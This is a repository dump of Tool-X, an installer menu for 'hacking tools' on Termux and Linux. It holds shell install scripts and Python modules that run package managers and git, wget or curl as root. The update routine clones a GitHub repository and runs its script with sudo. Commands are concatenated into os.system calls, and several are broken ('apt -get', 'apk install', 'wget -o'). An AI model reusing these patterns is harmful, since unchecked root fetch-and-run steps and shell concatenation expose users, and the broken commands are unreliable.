X/core/toolx: -------------------------------------------------------------------------------- 1 | # Tool Name :- Tool-X 2 | # Author :- Rajkumar dusad 3 | # Date :- 1/11/2017 4 | 5 | if [ -d /data/data/com.termux/files/usr/etc ]; then 6 | conf_dir="/data/data/com.termux/files/usr/etc" 7 | elif [ -d /usr/etc ]; then 8 | conf_dir="/usr/etc" 9 | elif [ -d /etc ]; then 10 | conf_dir="/etc" 11 | fi 12 | 13 | if [ -e /usr/lib/sudo ]; then 14 | sudo python3 $conf_dir/Tool-X/Tool-X.py 15 | else 16 | python3 $conf_dir/Tool-X/Tool-X.py 17 | fi 18 | exit -------------------------------------------------------------------------------- /Tool X/core/toolx.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hoangmanhkhiem/Python/7ec85e3f5453e8d04ccf451aff66ec9208658d4a/Tool X/core/toolx.png -------------------------------------------------------------------------------- /Tool X/core/toolx_cat.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hoangmanhkhiem/Python/7ec85e3f5453e8d04ccf451aff66ec9208658d4a/Tool X/core/toolx_cat.png -------------------------------------------------------------------------------- /Tool X/install: -------------------------------------------------------------------------------- 1 | # Tool Name :- Tool-X 2 | # Date :- 1/11/2017 3 | 4 | if [ -e /usr/lib/sudo ];then 5 | if [ -e /usr/bin/apt-get ];then 6 | if [ ! -e /usr/bin/python3 ];then 7 | sudo apt-get update 8 | sudo apt-get upgrade -y 9 | sudo apt-get install python -y 10 | sudo apt-get install python3 -y 11 | fi 12 | fi 13 | else 14 | if [ -d /usr/bin ];then 15 | if [ -e /usr/bin/apt-get ];then 16 | if [ ! -e /usr/bin/python3 ];then 17 | apt-get update 18 | apt -get upgrade -y 19 | apt-get install python -y 20 | apt-get install python3 -y 21 | fi 22 | fi 23 | fi 24 | fi 25 | if [ -d /data/data/com.termux/files/usr/bin ]; then 26 | if [ ! -e /data/data/com.termux/files/usr/bin/python3 ];then 27 | pkg update 28 | pkg upgrade -y 29 | pkg install python -y 30 | pkg install python3 -y 31 | fi 32 | fi 33 | if [ -e /usr/lib/sudo ];then 34 | if [ -e /usr/bin/yum ];then 35 | if [ ! -e /usr/bin/python3 ];then 36 | sudo yum update 37 | sudo yum upgrade -y 38 | sudo yum install python -y 39 | sudo yum install python3 -y 40 | fi 41 | fi 42 | else 43 | if [ -d /usr/bin ];then 44 | if [ -e /usr/bin/yum ];then 45 | if [ ! -e /usr/bin/python3 ];then 46 | yum update 47 | yum upgrade -y 48 | yum install python -y 49 | yum install python3 -y 50 | fi 51 | fi 52 | fi 53 | fi 54 | if [ -e /usr/local/bin/brew ];then 55 | if [ ! -e /usr/local/bin/python3 ];then 56 | brew install python -y 57 | brew install python3 -y 58 | fi 59 | fi 60 | if [ -e /usr/local/bin/brew ];then 61 | if [ ! -e /usr/local/bin/python ];then 62 | brew install python -y 63 | brew install python3 -y 64 | fi 65 | fi 66 | if [ -e /usr/bin/apk ];then 67 | if [ ! -e /usr/bin/python ];then 68 | apk install python -y 69 | apk install python3 -y 70 | fi 71 | fi 72 | if [ -e /usr/bin/apk ];then 73 | if [ ! -e /usr/bin/python3 ];then 74 | apk install python -y 75 | apk install python3 -y 76 | fi 77 | fi 78 | pip install -r requirements.txt 79 | python3 install.py 80 | exit 81 | -------------------------------------------------------------------------------- /Tool X/install.aex: -------------------------------------------------------------------------------- 1 | # Tool Name :- Tool-X 2 | # Date :- 1/11/2017 3 | 4 | if [ -e /usr/lib/sudo ];then 5 | if [ -e /usr/bin/apt-get ];then 6 | if [ ! -e /usr/bin/python3 ];then 7 | sudo apt-get update 8 | sudo apt-get upgrade -y 9 | sudo apt-get install python -y 10 | sudo apt-get install python3 -y 11 | fi 12 | fi 13 | else 14 | if [ -d /usr/bin ];then 15 | if [ -e /usr/bin/apt-get ];then 16 | if [ ! -e /usr/bin/python3 ];then 17 | apt-get update 18 | apt -get upgrade -y 19 | apt-get install python -y 20 | apt-get install python3 -y 21 | fi 22 | fi 23 | fi 24 | fi 25 | if [ -d /data/data/com.termux/files/usr/bin ]; then 26 | if [ ! -e /data/data/com.termux/files/usr/bin/python3 ];then 27 | pkg update 28 | pkg upgrade -y 29 | pkg install python -y 30 | pkg install python3 -y 31 | fi 32 | fi 33 | if [ -e /usr/lib/sudo ];then 34 | if [ -e /usr/bin/yum ];then 35 | if [ ! -e /usr/bin/python3 ];then 36 | sudo yum update 37 | sudo yum upgrade -y 38 | sudo yum install python -y 39 | sudo yum install python3 -y 40 | fi 41 | fi 42 | else 43 | if [ -d /usr/bin ];then 44 | if [ -e /usr/bin/yum ];then 45 | if [ ! -e /usr/bin/python3 ];then 46 | yum update 47 | yum upgrade -y 48 | yum install python -y 49 | yum install python3 -y 50 | fi 51 | fi 52 | fi 53 | fi 54 | if [ -e /usr/local/bin/brew ];then 55 | if [ ! -e /usr/local/bin/python3 ];then 56 | brew install python -y 57 | brew install python3 -y 58 | fi 59 | fi 60 | if [ -e /usr/local/bin/brew ];then 61 | if [ ! -e /usr/local/bin/python ];then 62 | brew install python -y 63 | brew install python3 -y 64 | fi 65 | fi 66 | if [ -e /usr/bin/apk ];then 67 | if [ ! -e /usr/bin/python ];then 68 | apk install python -y 69 | apk install python3 -y 70 | fi 71 | fi 72 | if [ -e /usr/bin/apk ];then 73 | if [ ! -e /usr/bin/python3 ];then 74 | apk install python -y 75 | apk install python3 -y 76 | fi 77 | fi 78 | pip install -r requirements.txt 79 | python3 install.py 80 | exit 81 | -------------------------------------------------------------------------------- /Tool X/install.py: -------------------------------------------------------------------------------- 1 | import os 2 | import sys 3 | from time import sleep 4 | from modules.logo import * 5 | from modules.system import * 6 | 7 | yellow="\033[1;33m" 8 | blue="\033[1;34m" 9 | nc="\033[00m" 10 | 11 | class tool: 12 | @classmethod 13 | def install(self): 14 | while True: 15 | system=sys() 16 | os.system("clear") 17 | logo.ins_tnc() 18 | inp=input(f"{yellow}Do you want to install Tool-X [Y/n]> {nc}") 19 | if inp=="y" or inp=="Y": 20 | os.system("clear") 21 | logo.installing() 22 | if system.sudo is not None: 23 | #require root permission 24 | if os.path.exists(system.conf_dir+"/Tool-X"): 25 | pass 26 | else: 27 | os.system(system.sudo+" mkdir "+system.conf_dir+"/Tool-X") 28 | os.system(system.sudo+" cp -r modules core Tool-X.py "+system.conf_dir+"/Tool-X") 29 | os.system(system.sudo+" cp -r core/Tool-X "+system.bin) 30 | os.system(system.sudo+" cp -r core/toolx "+system.bin) 31 | os.system(system.sudo+" chmod +x "+system.bin+"/Tool-X") 32 | os.system(system.sudo+" chmod +x "+system.bin+"/toolx") 33 | os.system("cd .. && "+system.sudo+" rm -rf Tool-X") 34 | if os.path.exists(system.bin+"/Tool-X") and os.path.exists(system.conf_dir+"/Tool-X"): 35 | os.system("clear") 36 | logo.ins_sc() 37 | tmp=input(f"{blue}Tool-X{nc}@{blue}space {yellow}$ {nc}") 38 | break 39 | else: 40 | os.system("clear") 41 | logo.not_ins() 42 | tmp=input(f"{blue}Tool-X{nc}@{blue}space {yellow}$ {nc}") 43 | break 44 | else: 45 | if os.path.exists(system.conf_dir+"/Tool-X"): 46 | pass 47 | else: 48 | os.system("mkdir "+system.conf_dir+"/Tool-X") 49 | os.system("cp -r modules core Tool-X.py "+system.conf_dir+"/Tool-X") 50 | os.system("cp -r core/Tool-X "+system.bin) 51 | os.system("cp -r core/toolx "+system.bin) 52 | os.system("chmod +x "+system.bin+"/Tool-X") 53 | os.system("chmod +x "+system.bin+"/toolx") 54 | os.system("cd .. && rm -rf Tool-X") 55 | if os.path.exists(system.bin+"/Tool-X") and os.path.exists(system.conf_dir+"/Tool-X"): 56 | os.system("clear") 57 | logo.ins_sc() 58 | tmp=input(f"{blue}Tool-X{nc}@{blue}space {yellow}$ {nc}") 59 | break 60 | else: 61 | os.system("clear") 62 | logo.not_ins() 63 | tmp=input(f"{blue}Tool-X{nc}@{blue}space {yellow}$ {nc}") 64 | break 65 | else: 66 | break 67 | 68 | if __name__=="__main__": 69 | try: 70 | tool.install() 71 | except KeyboardInterrupt: 72 | os.system("clear") 73 | logo.exit() 74 | -------------------------------------------------------------------------------- /Tool X/modules/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hoangmanhkhiem/Python/7ec85e3f5453e8d04ccf451aff66ec9208658d4a/Tool X/modules/__init__.py -------------------------------------------------------------------------------- /Tool X/modules/logo.py: -------------------------------------------------------------------------------- 1 | red="\033[1;31m" 2 | green="\033[1;32m" 3 | yellow="\033[1;33m" 4 | blue="\033[1;34m" 5 | purple="\033[1;35m" 6 | cyan="\033[1;36m" 7 | violate="\033[1;37m" 8 | nc="\033[00m" 9 | 10 | class logo: 11 | @classmethod 12 | def tool_header(self): 13 | print(f'''\007 14 | 15 | {yellow} 16 | _____ _ __ __ 17 | |_ _|__ ___ | | \ \/ / 18 | | |/ _ \ / _ \| |____\ / 19 | | | (_) | (_) | |____/ \ 20 | |_|\___/ \___/|_| /_/\_\ {purple}v2.1 21 | 22 | 23 | {cyan} ============================================= 24 | {yellow}| Install Best Hacking Tool | 25 | {yellow}| Copyright : K19 | 26 | {cyan} ============================================={nc}''') 27 | 28 | @classmethod 29 | def tool_footer(self): 30 | print(f'''{cyan}_______________________________________________ 31 | ==============================================={nc}''') 32 | 33 | 34 | @classmethod 35 | def not_ins(self): 36 | self.tool_header() 37 | print (f''' 38 | {cyan} [ + ] {red}We can't install Tool-X. 39 | {cyan} [ + ] {red}There are some error. 40 | {cyan} [ + ] {red}Please try again after some time!''') 41 | self.tool_footer() 42 | 43 | @classmethod 44 | def ins_tnc(self): 45 | self.tool_header() 46 | print (f''' 47 | {yellow} [ + ] {green}Use It At Your Own Risk. 48 | {yellow} [ + ] {green}No Warranty. 49 | {yellow} [ + ] {green}Use it legal purpose only. 50 | {yellow} [ + ] {green}We are not responsible for your actions. 51 | {yellow} [ + ] {green}Do not do things that are forbidden. 52 | 53 | {red} If you are installing this tool. 54 | that means you are agree with all terms.''') 55 | self.tool_footer() 56 | 57 | @classmethod 58 | def ins_sc(self): 59 | self.tool_header() 60 | print (f''' 61 | {yellow} [ + ] {green}Tool-X installed successfully. 62 | {yellow} [ + ] {green}To run Tool-X, 63 | {yellow} [ + ] {green}Type Tool-X in your terminal.''') 64 | self.tool_footer() 65 | 66 | @classmethod 67 | def update(self): 68 | self.tool_header() 69 | print (f''' 70 | {yellow} [ 1 ] {green}Update your Tool-X. 71 | {yellow} [ 0 ] {green}For Back.{nc}''') 72 | self.tool_footer() 73 | 74 | @classmethod 75 | def updated(self): 76 | self.tool_header() 77 | print (f''' 78 | {yellow} [ + ] {green}Tool-X Updated Successfully. 79 | {yellow} [ + ] {green}Press Enter to continue.{nc}''') 80 | self.tool_footer() 81 | 82 | @classmethod 83 | def nonet(self): 84 | self.tool_header() 85 | print (f''' 86 | {cyan} [ + ] {red}No network connection? 87 | {cyan} [ + ] {red}Are you offline? 88 | {cyan} [ + ] {red}Please try again after some time.{nc}''') 89 | self.tool_footer() 90 | 91 | @classmethod 92 | def update_error(self): 93 | self.tool_header() 94 | print (f''' 95 | {red} [ + ] {red}We can't Update Tool-X.\033[1;m 96 | {red} [ + ] {red}Please try again after some time.{nc}''') 97 | self.tool_footer() 98 | 99 | 100 | @classmethod 101 | def about(self,total): 102 | self.tool_header() 103 | print (f''' 104 | {yellow} [+] Tool Name :- {green}Tool-X 105 | {yellow} [+] Latest Update :- {green}23/3/2019.\033[1;m 106 | {yellow} [+] Tools :- {green}total {total} tools.\033[1;m 107 | 108 | {yellow} [+] {green}Tool-x is automatic tool installer. 109 | {yellow} [+] {green}Made for termux and linux based system. 110 | {red} [+] Note :- Use this tool at your own risk.''') 111 | self.tool_footer() 112 | 113 | 114 | @classmethod 115 | def install_tools(self): 116 | print (f"""{yellow} ============================================= 117 | {green}|_____________ Select your tool ______________| 118 | {yellow}============================================={nc}""") 119 | 120 | @classmethod 121 | def already_installed(self,name): 122 | self.tool_header() 123 | print(f''' 124 | {yellow} [ + ] {green}Sorry ?? 125 | {yellow} [ + ] {violate}'{name}'{green} is already Installed !! 126 | ''') 127 | self.tool_footer() 128 | 129 | @classmethod 130 | def installed(self,name): 131 | self.tool_header() 132 | print(f''' 133 | {yellow} [ + ] {green}Installed Successfully !! 134 | {yellow} [ + ] {violate}'{name}'{green} is Installed Successfully !! 135 | ''') 136 | self.tool_footer() 137 | 138 | @classmethod 139 | def not_installed(self,name): 140 | self.tool_header() 141 | print(f''' 142 | {yellow} [ + ] {red}Sorry ?? 143 | {yellow} [ + ] {violate}'{name}'{red} is not installed !! 144 | ''') 145 | self.tool_footer() 146 | 147 | @classmethod 148 | def back(self): 149 | print (f"""\033[01;36m ============================================= 150 | {yellow}| 00) Back | 151 | \033[01;36m============================================={nc}""") 152 | 153 | @classmethod 154 | def updating(self): 155 | print (f"""{yellow} ============================================= 156 | {green}|______________ Updating Tool-X ______________| 157 | {yellow}============================================={nc}""") 158 | 159 | @classmethod 160 | def installing(self): 161 | print (f"""{yellow} ============================================= 162 | {green}|________________ Installing _________________| 163 | {yellow}============================================={nc}""") 164 | 165 | @classmethod 166 | def menu(self,total): 167 | self.tool_header() 168 | print (f''' 169 | {yellow} [ 1 ] {green}Show all tools.{yellow} [ {purple}{total} tools{yellow} ] 170 | {yellow} [ 2 ] {green}Tools Category. 171 | {yellow} [ 3 ] {green}Update Tool-X. 172 | {yellow} [ 4 ] {green}About Us. 173 | {yellow} [ x ] {green}For Exit.''') 174 | self.tool_footer() 175 | 176 | @classmethod 177 | def exit(self): 178 | self.tool_header() 179 | print (f''' 180 | {yellow} [ + ] {green}Thanks for using Tool-X 181 | {yellow} [ + ] {green}Good Bye.....! ){nc}''') 182 | self.tool_footer() 183 | -------------------------------------------------------------------------------- /Tool X/modules/menu.py: -------------------------------------------------------------------------------- 1 | import os 2 | import json 3 | from time import sleep 4 | from .logo import * 5 | from .system import * 6 | 7 | red="\033[1;31m" 8 | green="\033[1;32m" 9 | yellow="\033[1;33m" 10 | blue="\033[1;34m" 11 | violate="\033[1;37m" 12 | nc="\033[00m" 13 | 14 | class main: 15 | def install_tools(self): 16 | while True: 17 | tool=tools() 18 | num=1 19 | total=len(tool.names) 20 | os.system("clear") 21 | logo.install_tools() 22 | print(f"\007") 23 | for tool_name in tool.names: 24 | print (f" {green}[ {violate}{num} {green}] {yellow}Install {green}{tool_name}{nc}") 25 | num+=1 26 | print(f"") 27 | logo.back() 28 | cmd=input(f"{blue}Tool-X{nc}@{blue}space {yellow}$ {nc}") 29 | if cmd=="00" or cmd=="back": 30 | self.menu() 31 | break 32 | else: 33 | try: 34 | if int(cmd)>=1 and int(cmd)<=int(total): 35 | os.system("clear") 36 | logo.installing() 37 | print(f"{green}Installing ....{nc}") 38 | tool.install(tool.names[int(cmd)-1]) 39 | else: 40 | print(f"\007{red}Sorry,{violate} '{cmd}' {blue}: {red}invalid input !!{nc}") 41 | sleep(1) 42 | except ValueError: 43 | print(f"\007{red}Sorry,{violate} '{cmd}' {blue}: {red}invalid input !!{nc}") 44 | sleep(1) 45 | 46 | def category(self): 47 | while True: 48 | tool=tools() 49 | total=len(tool.category) 50 | num=1 51 | os.system("clear") 52 | logo.tool_header() 53 | print(f"") 54 | for cat in tool.category: 55 | print (f" {green}[ {violate}{num} {green}] {yellow}{tool.category_data[cat]}{nc}") 56 | num+=1 57 | print(f"") 58 | logo.back() 59 | cmd=input(f"{blue}Tool-X{nc}@{blue}space {yellow}$ {nc}") 60 | if cmd=="00" or cmd=="back": 61 | self.menu() 62 | break 63 | else: 64 | try: 65 | if int(cmd) in range(1,int(total)+1): 66 | while True: 67 | print(int(cmd)-1) 68 | print(tool.category[int(cmd)-1]) 69 | cnt=1 70 | os.system("clear") 71 | logo.tool_header() 72 | print(f"") 73 | tmp_cat_tool=[] 74 | for i in tool.names: 75 | if tool.category[int(cmd)-1] in tool.data[i]["category"]: 76 | tmp_cat_tool.append(tool.data[i]['name']) 77 | print(f" {green}[ {violate}{cnt} {green}] {yellow}Install {green}{tool.data[i]['name']}{nc}") 78 | cnt+=1 79 | print(f"") 80 | logo.back() 81 | tcmd=input(f"{blue}Tool-X{nc}@{blue}space {yellow}$ {nc}") 82 | if tcmd=="00" or tcmd=="back": 83 | break 84 | else: 85 | try: 86 | cat_total=len(tmp_cat_tool) 87 | if int(tcmd) in range(1,int(cat_total)+1): 88 | os.system("clear") 89 | logo.installing() 90 | print(f"{green}Installing ....{nc}") 91 | tool.install(tmp_cat_tool[int(tcmd)-1]) 92 | else: 93 | print(f"\007{red}Sorry,{violate} '{tcmd}' {blue}: {red}invalid input !!{nc}") 94 | sleep(1) 95 | except ValueError: 96 | print(f"\007{red}Sorry,{violate} '{tcmd}' {blue}: {red}invalid input !!{nc}") 97 | sleep(1) 98 | else: 99 | print(f"\007{red}Sorry,{violate} '{cmd}' {blue}: {red}invalid input !!{nc}") 100 | sleep(1) 101 | except ValueError: 102 | print(f"\007{red}Sorry,{violate} '{cmd}' {blue}: {red}invalid input !!{nc}") 103 | sleep(1) 104 | 105 | def update(self): 106 | while True: 107 | os.system("clear") 108 | logo.update() 109 | cmd=input(f"{blue}Tool-X{nc}@{blue}space {yellow}$ {nc}") 110 | if cmd=="1": 111 | system=sys() 112 | if system.connection(): 113 | os.system("clear") 114 | logo.updating() 115 | if system.sudo != None: 116 | if os.path.exists(system.home+"/Tool-X"): 117 | pass 118 | else: 119 | os.system(system.sudo+" git clone https://github.com/rajkumardusad/Tool-X.git "+system.home+"/Tool-X") 120 | if os.path.exists(system.home+"/Tool-X/install.aex"): 121 | os.system("cd "+system.home+"/Tool-X && "+system.sudo+" sh install.aex") 122 | if os.path.exists(system.bin+"/Tool-X") and os.path.exists(system.conf_dir+"/Tool-X"): 123 | os.system("clear") 124 | logo.updated() 125 | cmd=input(f"{blue}Tool-X{nc}@{blue}space {yellow}$ {nc}") 126 | else: 127 | os.system("clear") 128 | logo.update_error() 129 | cmd=input(f"{blue}Tool-X{nc}@{blue}space {yellow}$ {nc}") 130 | else: 131 | os.system("clear") 132 | logo.update_error() 133 | cmd=input(f"{blue}Tool-X{nc}@{blue}space {yellow}$ {nc}") 134 | else: 135 | if os.path.exists(system.home+"/Tool-X"): 136 | pass 137 | else: 138 | os.system("git clone https://github.com/rajkumardusad/Tool-X.git "+system.home+"/Tool-X") 139 | if os.path.exists(system.home+"/Tool-X/install.aex"): 140 | os.system("cd "+system.home+"/Tool-X && sh install.aex") 141 | if os.path.exists(system.bin+"/Tool-X") and os.path.exists(system.conf_dir+"/Tool-X"): 142 | os.system("clear") 143 | logo.updated() 144 | cmd=input(f"{blue}Tool-X{nc}@{blue}space {yellow}$ {nc}") 145 | else: 146 | os.system("clear") 147 | logo.update_error() 148 | cmd=input(f"{blue}Tool-X{nc}@{blue}space {yellow}$ {nc}") 149 | else: 150 | os.system("clear") 151 | logo.update_error() 152 | cmd=input(f"{blue}Tool-X{nc}@{blue}space {yellow}$ {nc}") 153 | else: 154 | os.system("clear") 155 | logo.nonet() 156 | tmp=input(f"{blue}Tool-X{nc}@{blue}space {yellow}$ {nc}") 157 | elif cmd=="0" or cmd=="back": 158 | self.menu() 159 | break 160 | else: 161 | print(f"\007{red}Sorry,{violate} '{cmd}' {blue}: {red}invalid input !!{nc}") 162 | sleep(1) 163 | 164 | def about(self): 165 | while True: 166 | tool=tools() 167 | total=len(tool.names) 168 | os.system("clear") 169 | logo.about(total) 170 | cmd=input(f"{blue}Tool-X{nc}@{blue}space {yellow}$ {nc}") 171 | self.menu() 172 | break 173 | 174 | @classmethod 175 | def menu(self): 176 | while True: 177 | tool=tools() 178 | total=len(tool.names) 179 | os.system("clear") 180 | logo.menu(total) 181 | cmd=input(f"{blue}Tool-X{nc}@{blue}space {yellow}$ {nc}") 182 | if cmd == "1": 183 | self.install_tools(self) 184 | break 185 | elif cmd == "2": 186 | self.category(self) 187 | break 188 | elif cmd == "3": 189 | self.update(self) 190 | break 191 | elif cmd == "4": 192 | self.about(self) 193 | break 194 | elif cmd=="x" or cmd=="X" or cmd=="exit": 195 | os.system("clear") 196 | logo.exit() 197 | break 198 | elif cmd=="rm -t" or cmd=="rm -T" or cmd=="uninstall tool-x" or cmd=="unistall Tool-X": 199 | system=sys() 200 | if system.sudo: 201 | os.system(system.sudo+" rm -rf "+system.bin+"/Tool-X") 202 | os.system(system.sudo+" rm -rf "+system.bin+"/toolx") 203 | os.system(system.sudo+" rm -rf "+system.conf_dir+"/Tool-X") 204 | else: 205 | os.system("rm -rf "+system.bin+"/Tool-X") 206 | os.system("rm -rf "+system.bin+"/toolx") 207 | os.system("rm -rf "+system.conf_dir+"/Tool-X") 208 | os.system("clear") 209 | logo.exit() 210 | break 211 | else: 212 | print(f"\007{red}Sorry,{violate} '{cmd}' {blue}: {red}invalid input !!{nc}") 213 | sleep(1) 214 | 215 | class tools: 216 | data=None 217 | names=None 218 | category=None 219 | category_data=None 220 | def __init__(self): 221 | system=sys() 222 | with open(system.conf_dir+"/Tool-X/core/data.json") as data_file: 223 | self.data=json.load(data_file) 224 | with open(system.conf_dir+"/Tool-X/core/cat.json") as cat_file: 225 | self.category_data=json.load(cat_file) 226 | self.names=list(self.data.keys()) 227 | self.category=list(self.category_data.keys()) 228 | 229 | def install(self,name): 230 | package_name=self.data[name]["package_name"] 231 | package_manager=self.data[name]["package_manager"] 232 | url=self.data[name]["url"] 233 | req=list(self.data[name]["dependency"]) 234 | system=sys() 235 | 236 | if system.connection(): 237 | if len(req)!=0 and req[0]!=None: 238 | for dep in req: 239 | if os.path.exists(system.bin+"/"+dep): 240 | pass 241 | else: 242 | if system.sudo != None: 243 | os.system(system.sudo+" "+system.pac+" install "+dep+" -y") 244 | else: 245 | os.system(system.pac+" install "+dep+" -y") 246 | 247 | if package_manager=="package_manager": 248 | if os.path.exists(system.bin+"/"+package_name): 249 | os.system("clear") 250 | logo.already_installed(name) 251 | tmp=input(f"{blue}Tool-X{nc}@{blue}space {yellow}$ {nc}") 252 | else: 253 | if system.sudo != None: 254 | os.system(system.sudo+" "+system.pac+" install "+package_name+" -y") 255 | else: 256 | os.system(system.pac+" install "+package_name+" -y") 257 | # check tool is installed or not 258 | if os.path.exists(system.bin+"/"+package_name): 259 | os.system("clear") 260 | logo.installed(name) 261 | tmp=input(f"{blue}Tool-X{nc}@{blue}space {yellow}$ {nc}") 262 | else: 263 | os.system("clear") 264 | logo.not_installed(name) 265 | tmp=input(f"{blue}Tool-X{nc}@{blue}space {yellow}$ {nc}") 266 | 267 | elif package_manager=="git": 268 | if os.path.exists(system.home+"/"+package_name): 269 | os.system("clear") 270 | logo.already_installed(name) 271 | tmp=input(f"{blue}Tool-X{nc}@{blue}space {yellow}$ {nc}") 272 | else: 273 | if system.sudo != None: 274 | os.system(system.sudo+" git clone "+url+" "+system.home+"/"+package_name) 275 | else: 276 | os.system("git clone "+url+" "+system.home+"/"+package_name) 277 | # check tool is installed or not 278 | if os.path.exists(system.home+"/"+package_name): 279 | os.system("clear") 280 | logo.installed(name) 281 | tmp=input(f"{blue}Tool-X{nc}@{blue}space {yellow}$ {nc}") 282 | else: 283 | os.system("clear") 284 | logo.not_installed(name) 285 | tmp=input(f"{blue}Tool-X{nc}@{blue}space {yellow}$ {nc}") 286 | 287 | elif package_manager=="wget": 288 | if os.path.exists(system.home+"/"+package_name): 289 | os.system("clear") 290 | logo.already_installed(name) 291 | tmp=input(f"{blue}Tool-X{nc}@{blue}space {yellow}$ {nc}") 292 | else: 293 | if system.sudo != None: 294 | os.system(system.sudo+" wget "+url+" -o "+system.home+"/"+package_name) 295 | else: 296 | os.system("wget "+url+" -o "+system.home+"/"+package_name) 297 | # check tool is installed or not 298 | if os.path.exists(system.home+"/"+package_name): 299 | os.system("clear") 300 | logo.installed(name) 301 | tmp=input(f"{blue}Tool-X{nc}@{blue}space {yellow}$ {nc}") 302 | else: 303 | os.system("clear") 304 | logo.not_installed(name) 305 | tmp=input(f"{blue}Tool-X{nc}@{blue}space {yellow}$ {nc}") 306 | 307 | elif package_manager=="curl": 308 | if os.path.exists(system.home+"/"+package_name): 309 | os.system("clear") 310 | logo.already_installed(name) 311 | tmp=input(f"{blue}Tool-X{nc}@{blue}space {yellow}$ {nc}") 312 | else: 313 | if system.sudo != None: 314 | os.system(system.sudo+" curl "+url+" -o "+system.home+"/"+package_name) 315 | else: 316 | os.system("curl "+url+" -o "+system.home+"/"+package_name) 317 | # check tool is installed or not 318 | if os.path.exists(system.home+"/"+package_name): 319 | os.system("clear") 320 | logo.installed(name) 321 | tmp=input(f"{blue}Tool-X{nc}@{blue}space {yellow}$ {nc}") 322 | else: 323 | os.system("clear") 324 | logo.not_installed(name) 325 | tmp=input(f"{blue}Tool-X{nc}@{blue}space {yellow}$ {nc}") 326 | else: 327 | os.system("clear") 328 | logo.nonet() 329 | tmp=input(f"{blue}Tool-X{nc}@{blue}space {yellow}$ {nc}") 330 | -------------------------------------------------------------------------------- /Tool X/modules/system.py: -------------------------------------------------------------------------------- 1 | import os 2 | import sys 3 | try: 4 | import requests 5 | except: 6 | os.system("pip install requests") 7 | os.system("pip3 install requests") 8 | 9 | class sys: 10 | pac=None 11 | sys=None 12 | home=os.getenv("HOME") 13 | bin=None 14 | sudo=None 15 | conf_dir=None 16 | def __init__(self): 17 | 18 | # checking for system root access 19 | if os.path.exists("/usr/lib/sudo"): 20 | self.sudo="sudo" 21 | elif os.path.exists("/lib/sudo"): 22 | self.sudo="sudo" 23 | elif os.path.exists("/usr/bin/sudo"): 24 | self.sudo="sudo" 25 | elif os.path.exists("/bin/sudo"): 26 | self.sudo="sudo" 27 | elif os.path.exists("/usr/sbin/sudo"): 28 | self.sudo="sudo" 29 | elif os.path.exists("/sbin/sudo"): 30 | self.sudo="sudo" 31 | 32 | # checking for configuration dir 33 | if os.path.exists("/usr/etc"): 34 | self.conf_dir="/usr/etc" 35 | elif os.path.exists("/data/data/com.termux/files/usr/etc"): 36 | self.conf_dir="/data/data/com.termux/files/usr/etc" 37 | elif os.path.exists("/etc"): 38 | self.conf_dir="/etc" 39 | 40 | # checking for system bin dir and system package manager 41 | if os.path.exists("/usr/bin/yum"): 42 | self.sys="linux" 43 | self.bin="/usr/bin" 44 | self.pac="yum" 45 | elif os.path.exists("/bin/yum"): 46 | self.sys="linux" 47 | self.bin="/bin" 48 | self.pac="yum" 49 | elif os.path.exists("/usr/sbin/yum"): 50 | self.sys="linux" 51 | self.bin="/usr/sbin" 52 | self.pac="yum" 53 | elif os.path.exists("/sbin/yum"): 54 | self.sys="linux" 55 | self.bin="/sbin" 56 | self.pac="yum" 57 | elif os.path.exists("/usr/bin/apt"): 58 | self.sys="linux" 59 | self.bin="/usr/bin" 60 | self.pac="apt-get" 61 | elif os.path.exists("/bin/apt"): 62 | self.sys="linux" 63 | self.bin="/bin" 64 | self.pac="apt-get" 65 | elif os.path.exists("/usr/sbin/apt"): 66 | self.sys="linux" 67 | self.bin="/usr/sbin" 68 | self.pac="apt-get" 69 | elif os.path.exists("/sbin/apt"): 70 | self.sys="linux" 71 | self.bin="/sbin" 72 | self.pac="apt-get" 73 | elif os.path.exists("/data/data/com.termux/files/usr/bin/pkg"): 74 | self.sys="linux" 75 | self.bin="/data/data/com.termux/files/usr/bin" 76 | self.pac="pkg" 77 | elif os.path.exists("/usr/local/bin/brew"): 78 | self.sys="linux" 79 | self.bin="/usr/local/bin" 80 | self.pac="brew" 81 | self.sudo=None 82 | elif os.path.exists("/usr/bin/apk"): 83 | self.sys="linux" 84 | self.bin="/usr/bin" 85 | self.pac="apk" 86 | elif os.path.exists("/bin/apk"): 87 | self.sys="linux" 88 | self.bin="/bin" 89 | self.pac="apk" 90 | elif os.path.exists("/usr/sbin/apk"): 91 | self.sys="linux" 92 | self.bin="/usr/sbin" 93 | self.pac="apk" 94 | elif os.path.exists("/sbin/apk"): 95 | self.sys="linux" 96 | self.bin="/sbin" 97 | self.pac="apk" 98 | 99 | def connection(self): 100 | try: 101 | if requests.get("https://www.google.com").ok: 102 | return True 103 | except: 104 | return False 105 | -------------------------------------------------------------------------------- /Tool X/requirements.txt: -------------------------------------------------------------------------------- 1 | requests>=2.24.0 2 | # Dependencies of requests 3 | idna<3,>=2.5 4 | certifi>=2017.4.17 5 | chardet<4,>=3.0.2 6 | --------------------------------------------------------------------------------